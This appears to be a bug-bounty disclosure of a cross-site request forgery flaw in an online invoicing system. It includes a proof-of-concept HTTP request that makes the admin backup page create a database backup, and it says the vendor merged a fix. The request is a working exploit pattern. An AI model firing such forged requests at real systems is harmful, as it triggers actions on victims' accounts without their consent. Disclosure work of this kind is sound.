Cross-Site Request Forgery (CSRF) in bigprof-software/online-invoicing-system

Valid

Reported on

Aug 4th 2021


✍️ Description

csrf bug to create a backup

🕵️‍♂️ Proof of Concept

Bellow request vulnerable to csrf bug which allow to create database backup

GET /online-invoice/app/admin/pageBackupRestore.php?action=create_backup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/online-invoice/app/admin/pageBackupRestore.php
Cookie: 

You need just simply open this url then new backup will be created

💥 Impact

csrf bug

We have contacted a member of the bigprof-software/online-invoicing-system team and are waiting to hear back 4 months ago
BigProf Software confirmed that a fix has been merged on 7e5f4d 3 months ago
BigProf Software has been awarded the fix bounty